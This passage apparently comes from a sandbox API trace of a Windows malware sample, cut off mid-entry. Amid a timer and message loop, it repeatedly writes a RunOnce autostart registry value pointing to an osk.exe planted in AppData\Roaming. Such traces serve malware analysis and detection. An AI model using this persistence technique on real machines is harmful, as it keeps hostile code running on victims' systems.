[0110.283] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.283] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.283] SetTimer (hWnd=0x20280, nIDEvent=0x246e, uElapse=0xa, lpTimerFunc=0x0) returned 0x246e [0110.284] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.329] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.329] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.329] KillTimer (hWnd=0x20280, uIDEvent=0x246e) returned 1 [0110.329] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.330] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.330] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.330] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.330] RegCloseKey (hKey=0x280) returned 0x0 [0110.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.330] SetTimer (hWnd=0x20280, nIDEvent=0x246f, uElapse=0xa, lpTimerFunc=0x0) returned 0x246f [0110.331] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.344] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.344] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.345] KillTimer (hWnd=0x20280, uIDEvent=0x246f) returned 1 [0110.345] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.345] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.345] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.346] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.346] RegCloseKey (hKey=0x280) returned 0x0 [0110.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.346] SetTimer (hWnd=0x20280, nIDEvent=0x2470, uElapse=0xa, lpTimerFunc=0x0) returned 0x2470 [0110.346] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.360] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.360] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.360] KillTimer (hWnd=0x20280, uIDEvent=0x2470) returned 1 [0110.360] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.361] RegCloseKey (hKey=0x280) returned 0x0 [0110.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.361] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.361] SetTimer (hWnd=0x20280, nIDEvent=0x2471, uElapse=0xa, lpTimerFunc=0x0) returned 0x2471 [0110.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.375] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.376] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.376] KillTimer (hWnd=0x20280, uIDEvent=0x2471) returned 1 [0110.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.376] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.376] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.377] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.377] RegCloseKey (hKey=0x280) returned 0x0 [0110.377] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.377] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.377] SetTimer (hWnd=0x20280, nIDEvent=0x2472, uElapse=0xa, lpTimerFunc=0x0) returned 0x2472 [0110.377] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.391] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.391] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.391] KillTimer (hWnd=0x20280, uIDEvent=0x2472) returned 1 [0110.392] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.392] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.392] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.392] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.392] RegCloseKey (hKey=0x280) returned 0x0 [0110.393] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.393] SetTimer (hWnd=0x20280, nIDEvent=0x2473, uElapse=0xa, lpTimerFunc=0x0) returned 0x2473 [0110.393] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.407] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.407] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.407] KillTimer (hWnd=0x20280, uIDEvent=0x2473) returned 1 [0110.407] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.408] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.408] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.408] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.408] RegCloseKey (hKey=0x280) returned 0x0 [0110.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0110.409] SetTimer (hWnd=0x20280, nIDEvent=0x2474, uElapse=0xa, lpTimerFunc=0x0) returned 0x2474 [0110.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.422] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.422] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.422] KillTimer (hWnd=0x20280, uIDEvent=0x2474) returned 1 [0110.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.423] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.423] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.423] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.424] RegCloseKey (hKey=0x280) returned 0x0 [0110.424] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.424] SetTimer (hWnd=0x20280, nIDEvent=0x2475, uElapse=0xa, lpTimerFunc=0x0) returned 0x2475 [0110.424] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.439] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.439] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.439] KillTimer (hWnd=0x20280, uIDEvent=0x2475) returned 1 [0110.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.440] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.440] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.440] RegCloseKey (hKey=0x280) returned 0x0 [0110.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.440] SetTimer (hWnd=0x20280, nIDEvent=0x2476, uElapse=0xa, lpTimerFunc=0x0) returned 0x2476 [0110.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.453] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.453] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.454] KillTimer (hWnd=0x20280, uIDEvent=0x2476) returned 1 [0110.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.454] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.454] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.455] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.455] RegCloseKey (hKey=0x280) returned 0x0 [0110.455] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.455] SetTimer (hWnd=0x20280, nIDEvent=0x2477, uElapse=0xa, lpTimerFunc=0x0) returned 0x2477 
[0110.455] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.469] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.469] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.469] KillTimer (hWnd=0x20280, uIDEvent=0x2477) returned 1 [0110.470] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.470] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.470] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.471] RegCloseKey (hKey=0x280) returned 0x0 [0110.471] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.471] SetTimer (hWnd=0x20280, nIDEvent=0x2478, uElapse=0xa, lpTimerFunc=0x0) returned 0x2478 [0110.471] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.485] KillTimer (hWnd=0x20280, uIDEvent=0x2478) returned 1 [0110.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.486] RegCloseKey (hKey=0x280) returned 0x0 [0110.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.486] SetTimer (hWnd=0x20280, nIDEvent=0x2479, uElapse=0xa, lpTimerFunc=0x0) returned 0x2479 [0110.487] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.500] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.500] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.501] KillTimer (hWnd=0x20280, uIDEvent=0x2479) returned 1 [0110.501] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.501] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.501] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.502] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.502] RegCloseKey (hKey=0x280) returned 0x0 [0110.502] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.502] SetTimer (hWnd=0x20280, nIDEvent=0x247a, uElapse=0xa, lpTimerFunc=0x0) returned 0x247a [0110.502] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0110.516] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.516] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.516] KillTimer (hWnd=0x20280, uIDEvent=0x247a) returned 1 [0110.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.517] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.517] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.517] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.517] RegCloseKey (hKey=0x280) returned 0x0 [0110.518] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.518] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.518] SetTimer (hWnd=0x20280, nIDEvent=0x247b, uElapse=0xa, lpTimerFunc=0x0) returned 0x247b [0110.518] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.532] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.532] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.532] KillTimer (hWnd=0x20280, uIDEvent=0x247b) returned 1 [0110.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.533] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.533] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.533] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.533] RegCloseKey (hKey=0x280) returned 0x0 [0110.533] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.534] SetTimer (hWnd=0x20280, nIDEvent=0x247c, uElapse=0xa, lpTimerFunc=0x0) returned 0x247c [0110.534] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.548] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.548] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.548] KillTimer (hWnd=0x20280, uIDEvent=0x247c) returned 1 [0110.548] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.549] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.549] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.549] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.549] RegCloseKey (hKey=0x280) returned 0x0 [0110.549] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.549] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.549] SetTimer (hWnd=0x20280, nIDEvent=0x247d, uElapse=0xa, lpTimerFunc=0x0) returned 0x247d [0110.550] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.936] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.936] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.937] KillTimer (hWnd=0x20280, uIDEvent=0x247d) returned 1 [0110.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.938] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.938] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.938] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.938] RegCloseKey (hKey=0x280) returned 0x0 [0110.938] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.938] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.938] SetTimer (hWnd=0x20280, nIDEvent=0x247e, uElapse=0xa, lpTimerFunc=0x0) returned 0x247e [0110.938] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.953] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.953] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.953] KillTimer (hWnd=0x20280, uIDEvent=0x247e) returned 1 [0110.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.954] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.954] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.954] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.954] RegCloseKey (hKey=0x280) returned 0x0 [0110.954] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.954] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.955] SetTimer (hWnd=0x20280, nIDEvent=0x247f, uElapse=0xa, lpTimerFunc=0x0) returned 0x247f [0110.955] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.968] KillTimer (hWnd=0x20280, uIDEvent=0x247f) returned 1 [0110.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.969] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.969] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.969] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.969] RegCloseKey (hKey=0x280) returned 0x0 [0110.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.970] SetTimer (hWnd=0x20280, nIDEvent=0x2480, uElapse=0xa, lpTimerFunc=0x0) returned 0x2480 [0110.970] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.984] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.984] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.984] KillTimer (hWnd=0x20280, 
